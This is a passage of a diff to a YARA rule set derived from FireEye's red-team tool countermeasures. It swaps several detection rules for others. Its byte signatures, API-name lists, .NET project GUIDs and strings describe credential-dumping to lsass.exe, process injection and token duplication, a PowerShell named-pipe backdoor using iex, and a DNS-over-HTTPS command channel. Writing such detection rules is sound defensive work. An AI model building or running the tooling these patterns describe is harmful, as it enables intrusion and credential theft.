?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 }
-		$bytes3 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 }
-		$bytes4 = { 4C 89 74 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC A0 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? BA 50 00 00 00 C7 05 ?? ?? ?? ?? 43 00 3A 00 66 89 15 ?? ?? 01 00 4C 8D 44 24 ?? 48 8D 15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 5C 00 57 00 33 C9 C7 05 ?? ?? ?? ?? 69 00 6E 00 C7 05 ?? ?? ?? ?? 64 00 6F 00 C7 05 ?? ?? ?? ?? 77 00 73 00 C7 05 ?? ?? ?? ?? 5C 00 4D 00 C7 05 ?? ?? ?? ?? 45 00 4D 00 C7 05 ?? ?? ?? ?? 4F 00 52 00 C7 05 ?? ?? ?? ?? 59 00 2E 00 C7 05 ?? ?? ?? ?? 44 00 4D 00 C7 05 ?? ?? ?? ?? 53 00 65 00 C7 05 ?? ?? ?? ?? 44 00 65 00 C7 05 ?? ?? ?? ?? 42 00 75 00 C7 05 ?? ?? ?? ?? 47 00 50 00 C7 05 ?? ?? ?? ?? 72 00 69 00 C7 05 ?? ?? ?? ?? 56 00 69 00 C7 05 ?? ?? ?? ?? 4C 00 45 00 C7 05 ?? ?? ?? ?? 67 00 65 00 C7 05 ?? ?? ?? ?? 6C 73 61 73 C7 05 ?? ?? ?? ?? 73 2E 65 78 C6 05 ?? ?? ?? ?? 65 FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? 01 00 00 00 C7 44 24 ?? 02 00 00 00 FF 15 ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 ?? 41 8D 56 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 44 24 ?? 4C 89 74 24 ?? 45 33 C9 33 D2 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 0F 1F 44 00 ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 41 B9 04 01 00 00 33 D2 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 ?? 48 89 BC 24 ?? ?? ?? ?? BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 4C 89 74 24 ?? C7 44 24 ?? 80 00 00 00 48 8D 0D ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 01 00 00 00 BA 00 00 00 10 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 ?? 41 B9 02 00 00 00 4C 89 74 24 ?? 4C 8B C7 8B D6 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B C8 FF 15 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? CC 48 8B CB FF 15 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 33 C0 48 8B B4 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 48 81 C4 A0 01 00 00 5D C3 }
+		$sb1 = { 1? 72 [4] 14 D0 [2] 00 02 28 [2] 00 0A 1? 8D [2] 00 01 13 ?? 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 28 [2] 00 0A 28 [2] 00 0A 80 [2] 00 04 7E [2] 00 04 7B [2] 00 0A 7E [2] 00 04 11 ?? 11 ?? 6F [2] 00 0A 6F [2] 00 0A }
+		$ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00"
+		$ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00"
+		$ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00"
+		$ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide
+		$ss5 = "1F 8B 08 00 00 00 00 00" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of ( $bytes* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Trojan_Win64_Generic_23 : FILE
+rule FIREEYE_RT_APT_Backdoor_PS1_BASICPIPESHELL_1
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "470bfeed-e000-58c6-b115-dfa8aea25bef"
-		date = "2020-12-02"
-		date = "2020-12-02"
-		modified = "2020-12-09"
+		id = "8f85d6cc-fd1e-5bf3-8052-440cbeda0ac9"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_23.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BASICPIPESHELL/production/yara/APT_Backdoor_PS1_BASICPIPESHELL_1.yar#L5-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "b66347ef110e60b064474ae746701d4a"
-		logic_hash = "4c1860801b26abbab8c4aea730bf69f388c902083b9945e11e6782af3ab22789"
+		logic_hash = "7a9f0002055ffe826562cab3d02d8babd14c5fcd6d0b528a2988e2649034279d"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		rev = 1
+		quality = 63
+		tags = ""
 
 	strings:
-		$api1 = "VirtualAllocEx" fullword
-		$api2 = "UpdateProcThreadAttribute" fullword
-		$api3 = "DuplicateTokenEx" fullword
-		$api4 = "CreateProcessAsUserA" fullword
-		$inject = { 8B 85 [4] C7 44 24 20 40 00 00 00 41 B9 00 30 00 00 44 8B C0 33 D2 48 8B 8D [4] FF 15 [4] 48 89 45 ?? 48 83 7D ?? 00 75 ?? 48 8B 45 ?? E9 [4] 8B 85 [4] 48 C7 44 24 20 00 00 00 00 44 8B C8 4C 8B 85 [4] 48 8B 55 ?? 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? 48 8B 45 ?? EB ?? 8B 85 [4] 48 8B 4D ?? 48 03 C8 48 8B C1 48 89 45 48 48 8D 85 [4] 48 89 44 24 30 C7 44 24 28 00 00 00 00 48 8B 85 [4] 48 89 44 24 20 4C 8B 4D ?? 41 B8 00 00 10 00 33 D2 48 8B 8D [4] FF 15 }
-		$process = { 48 C7 44 24 30 00 00 00 00 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 08 00 00 00 4C 8D 8D [4] 41 B8 00 00 02 00 33 D2 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? E9 [4] 48 8B 85 [4] 48 89 85 [4] 48 8D 85 [4] 48 89 44 24 50 48 8D 85 [4] 48 89 44 24 48 48 C7 44 24 40 00 00 00 00 48 C7 44 24 38 00 00 00 00 C7 44 24 30 04 00 08 00 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 05 [4] 33 D2 48 8B [2-5] FF 15 }
-		$token = { FF 15 [4] 4C 8D 45 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 75 ?? E9 [4] 48 8D [2-5] 48 89 44 24 28 C7 44 24 20 02 00 00 00 41 B9 02 00 00 00 45 33 C0 BA 0B 00 00 00 48 8B 4D ?? FF 15 [4] 85 C0 75 ?? E9 [4] 4C 8D 8D [4] 45 33 C0 BA 01 00 00 00 33 C9 FF 15 }
+		$s1 = "function Invoke-Client()" ascii nocase wide
+		$s2 = "function Invoke-Server" ascii nocase wide
+		$s3 = "Read-Host 'Enter Command:'" ascii nocase wide
+		$s4 = "new-object System.IO.Pipes.NamedPipeClientStream(" ascii nocase wide
+		$s5 = "new-object System.IO.Pipes.NamedPipeServerStream(" ascii nocase wide
+		$s6 = " = iex $" ascii nocase wide
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
+		all of them
 }
-rule FIREEYE_RT_Trojan_Win64_Generic_22 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPGOPHER_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpgopher' project."
 		author = "FireEye"
-		id = "e79661a8-5254-5e8e-b92b-edf1ddb072ff"
-		date = "2020-11-26"
-		date = "2020-11-26"
+		id = "cc8eb9cd-9a51-5fab-b0a4-247baaa69dd7"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_22.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPGOPHER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f7d9961463b5110a3d70ee2e97842ed3"
-		logic_hash = "52fbe5c0ee7c05df5fcd62c26caaa5498e32352da9c5940e522aa31d6c808028"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "ac37f77440cb76d7dafa4c9b4130471ca6ca760f6d72691db9ebb8cbaaad0c58"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 2
 
 	strings:
-		$api1 = "VirtualAllocEx" fullword
-		$api2 = "UpdateProcThreadAttribute" fullword
-		$api3 = "DuplicateTokenEx" fullword
-		$api4 = "CreateProcessAsUserA" fullword
-		$inject = { C7 44 24 20 40 00 00 00 33 D2 41 B9 00 30 00 00 41 B8 [4] 48 8B CB FF 15 [4] 48 8B F0 48 85 C0 74 ?? 4C 89 74 24 20 41 B9 [4] 4C 8D 05 [4] 48 8B D6 48 8B CB FF 15 [4] 85 C0 75 [5-10] 4C 8D 0C 3E 48 8D 44 24 ?? 48 89 44 24 30 44 89 74 24 28 4C 89 74 24 20 33 D2 41 B8 [4] 48 8B CB FF 15 }
-		$process = { 89 74 24 30 ?? 8D 4C 24 [2] 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 [4] 85 C0 0F 84 [4] 48 8B [2-3] 48 8D 45 ?? 48 89 44 24 50 4C 8D 05 [4] 48 8D 45 ?? 48 89 7D 08 48 89 44 24 48 45 33 C9 ?? 89 74 24 40 33 D2 ?? 89 74 24 38 C7 44 24 30 04 00 08 00 [0-1] 89 74 24 28 ?? 89 74 24 20 FF 15 }
-		$token = { FF 15 [4] 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 0F 84 [4] 48 8B 4C 24 ?? 48 8D [2-3] 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 [4] 85 C0 0F 84 [4] 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 01 FF 15 }
+		$typelibguid0 = "83413a89-7f5f-4c3f-805d-f4692bc60173" ascii nocase wide
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_PXELOOT_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_PRAT_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the PXE And Loot project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'prat' project."
 		author = "FireEye"
-		id = "5a72a6ff-bae4-57f5-a19b-a4595ac57293"
+		id = "4a876eb0-ed2f-5ef2-a9b3-ba728b07c8c0"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PXELOOT/production/yara/HackTool_MSIL_PXELOOT_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_PRAT_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "82e33011ac34adfcced6cddc8ea56a81"
-		logic_hash = "c9892adcb9ff5471235e45988f6662d3b8f984fdafca7024a5781eed50f6c0b3"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "d707f017b56b0a873f1edca085ad40fc70cb24e8c9844f377bc28871a941d0b4"
 		score = 75
-		quality = 73
+		quality = 67
 		tags = "FILE"
-		rev = 7
+		rev = 3
 
 	strings:
-		$typelibguid1 = "78B2197B-2E56-425A-9585-56EDC2C797D6" ascii nocase wide
+		$typelibguid0 = "7d1219fb-a954-49a7-96c9-df9e6429a8c7" ascii nocase wide
+		$typelibguid1 = "bc1157c2-aa6d-46f8-8d73-068fc08a6706" ascii nocase wide
+		$typelibguid2 = "c602fae2-b831-41e2-b5f8-d4df6e3255df" ascii nocase wide
+		$typelibguid3 = "dfaa0b7d-6184-4a9a-9eeb-c08622d15801" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Tool_MSIL_Csharputils_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNATIVEZIPPER_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CSharpUtils' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpnativezipper' project."
 		author = "FireEye"
-		id = "a0e8c45a-759a-5611-aa2a-3113a75fb651"
+		id = "c48835a7-06fe-5b30-be4d-086d98dc7a21"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPUTILS/production/yara/Tool_MSIL_CSharpUtils_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPNATIVEZIPPER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "11dfd44fb4ee1e610c2e4a941b3a1e88eafc30a2a2237529150e73bceb2a1324"
+		logic_hash = "fa54375b21abbb613e695f70a15233575fbe6e0536716544bb3b527f5e3ed8c6"
 		score = 75
-		quality = 65
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$typelibguid0 = "2130bcd9-7dd8-4565-8414-323ec533448d" ascii nocase wide
-		$typelibguid1 = "319228f0-2c55-4ce1-ae87-9e21d7db1e40" ascii nocase wide
-		$typelibguid2 = "4471fef9-84f5-4ddd-bc0c-31f2f3e0db9e" ascii nocase wide
-		$typelibguid3 = "5c3bf9db-1167-4ef7-b04c-1d90a094f5c3" ascii nocase wide
-		$typelibguid4 = "ea383a0f-81d5-4fa8-8c57-a950da17e031" ascii nocase wide
+		$typelibguid0 = "de5536db-9a35-4e06-bc75-128713ea6d27" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Rubeus_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_DNSOVERHTTPS_C2_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public Rubeus project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'DoHC2' External C2 project."
 		author = "FireEye"
-		id = "0ca140ea-2b9f-5904-a4c0-8615229626f0"
+		id = "ee71be6c-e3c8-5365-9f32-157f00066c49"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RUBEUS/production/yara/HackTool_MSIL_Rubeus_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_DNSOVERHTTPS_C2_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "66e0681a500c726ed52e5ea9423d2654"
-		logic_hash = "ad954f9922ab564d68cb4515b080f6ee69476a8d87f0038e2ae4c222f0e182d7"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "a482161bbd8e249977f28466ff1381d4693495f8b8ccd9183ae4fde1ec1471eb"
 		score = 75
-		quality = 73
+		quality = 71
 		tags = "FILE"
-		rev = 4
+		rev = 2
 
 	strings:
-		$typelibguid = "658C8B7F-3664-4A95-9572-A3E5871DFC06" ascii nocase wide
+		$typelibguid0 = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii nocase wide
+		$typelibguid1 = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii nocase wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $typelibguid
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Backdoor_Win_GORAT_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPWEBCRAWLER_1 : FILE
 {
 	meta:
-		description = "This detects if a sample is less than 50KB and has a number of strings found in the Gorat shellcode (stage0 loader). The loader contains an embedded DLL (stage0.dll) that contains a number of unique strings. The 'Cookie' string found in this loader is important as this cookie is needed by the C2 server to download the Gorat implant (stage1 payload)."
